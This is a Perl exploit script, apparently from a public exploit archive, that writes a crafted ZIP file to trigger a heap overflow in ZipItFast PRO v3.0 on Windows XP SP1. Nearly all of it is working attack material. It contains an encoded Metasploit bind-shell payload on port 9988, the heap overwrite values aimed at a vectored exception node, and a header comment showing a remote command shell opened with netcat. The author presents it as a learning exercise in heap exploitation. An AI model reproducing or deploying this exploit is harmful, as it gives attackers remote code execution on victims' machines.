#!/usr/bin/perl #---------------------------------------------------------------------------# # Exploit: ZipItFast PRO v3.0 Heap-Overflow # # Author: b33f - http://www.fuzzysecurity.com/ # # OS: Windows XP SP1 # # DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/ # # Software: http://www.exploit-db.com/wp-content/themes/exploit/ # # applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe # #---------------------------------------------------------------------------# # Sorry for reinventing the wheel but learning about heap-overflows # # requires you to take a step back and roll with the punches not unlike # # watching a David Lynch production ;))... # # # # - "Who is that lady with the log?" # # + "We call her the log-lady.." # #---------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.131 9988 # # (UNKNOWN) [192.168.111.131] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:\Documents and Settings\Owner\Desktop> # #---------------------------------------------------------------------------# use strict; use warnings; my $filename = "Exploit.zip"; my $head = "\x50\x4B\x03\x04\x14\x00\x00". "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00"; my $head2 = "\x50\x4B\x01\x02\x14\x00\x14". "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00\x00\x00\x00\x01\x00". "\x24\x00\x00\x00\x00\x00\x00\x00"; my $head3 = "\x50\x4B\x05\x06\x00\x00\x00". "\x00\x01\x00\x01\x00". "\x12\x10\x00\x00". "\x02\x10\x00\x00". "\x00\x00"; # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t # [*] x86/alpha_mixed succeeded with size 744 (iteration=1) my $ph33r = "\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" . "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" . "\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70" . "\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44" . "\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b" . "\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37" . "\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c" . "\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31" . "\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52" . "\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c" . "\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50" . "\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68" . "\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53" . "\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56" . "\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f" . "\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54" . "\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45" . "\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73" . "\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c" . "\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70" . "\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61" . "\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f" . "\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78" . "\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53" . "\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46" . "\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70" . "\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49" . "\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70" . "\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48" . "\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69" . "\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50" . "\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66" . "\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f" . "\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68" . "\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48" . "\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77" . "\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31" . "\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30" . "\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66" . "\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56" . "\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d" . "\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74" . "\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e" . "\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c" . "\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e" . "\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77" . "\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75" . "\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d" . "\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70" . "\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63" . "\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45" . "\x41\x41"; my $buf1 = "A" x 4064 . ".txt"; ################# # EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE) # EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode) # Jump over Blink and Flink => EB 0A ################# my $magic = "\xEB\x0A" . "\x0C\x32\xFC\x77" . "\x20\xFA\x12\x00"; ################## # Notice that the offsets don't correspond exactly. I experienced some buffer # expansion and compression depending on the buffer structure so keep that in # mind if you want to do some testing. # # Remember to set Anti-Debugging flags in your debugger.. # (immunity = > !hidedebug All_Debug) ################## my $buf2 = "\x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt"; my $zip = $head.$buf1.$head2.$buf2.$head3; open(FILE,">$filename") || die "[-]Error:\n$!\n"; print FILE $zip; close(FILE);